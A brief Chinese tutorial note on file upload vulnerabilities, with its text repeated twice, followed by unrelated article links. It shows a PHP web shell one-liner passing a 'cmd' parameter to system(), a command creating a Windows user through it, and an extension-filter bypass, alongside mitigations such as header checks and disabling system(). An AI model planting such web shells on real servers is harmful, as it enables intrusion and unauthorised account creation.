文件上传漏洞
2016-07-31 20:44
309 查看
约束文件类型
实例:
上传txt 上传成功
上传 hello.php 内容输入<?php phpinfo(); ?>
上传一个命令
<?php system($_get['cmd']);?> 上传成功
给命令传入参数
新建用户 net user hello pass /add
向服务器传文件 echo aaaaaaaaaaaaaaaaaa>>d:1.txt
避免:
1.文件上传的过滤
a.通过文件后缀名 MP3 -> php 截包绕过
b.通过二进制来判断文件类型 通过文件头等判断
2.修改服务器核心参数,禁止脚本引擎允许命令
php_ini disable_functions = system
实例:
上传txt 上传成功
上传 hello.php 内容输入<?php phpinfo(); ?>
上传一个命令
<?php system($_get['cmd']);?> 上传成功
给命令传入参数
新建用户 net user hello pass /add
向服务器传文件 echo aaaaaaaaaaaaaaaaaa>>d:1.txt
避免:
1.文件上传的过滤
a.通过文件后缀名 MP3 -> php 截包绕过
b.通过二进制来判断文件类型 通过文件头等判断
2.修改服务器核心参数,禁止脚本引擎允许命令
php_ini disable_functions = system
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- DDOS拒绝服务攻击
- 初学Python(二)
- 最短路径问题/Spfa
- HTTP协议详解(真的很经典)
- 华为SSH、Console配置
- poj2253 Frogger(用单源最短路dijkstra的思路求解)
- Inotify与Android文件监控FileObserver原理
- 页面上传图片后立即预览
- 认证与授权
- 17. Letter Combinations of a Phone Number
- Office编程 VS操作Office文档
- Ubuntu下安装Master PDF Editor
- .net附件接口实现
- POJ 1363 Rails
- HDOJ-1873
- Hibernate、Spring和Spring MVC的整合
- POJ 3279 Fliptile (开关转换)
- (第17讲)堆的数组实现
- Spark RDD概念学习系列之Spark的算子的分类(十一)
- 利用反汇编手段解析C语言函数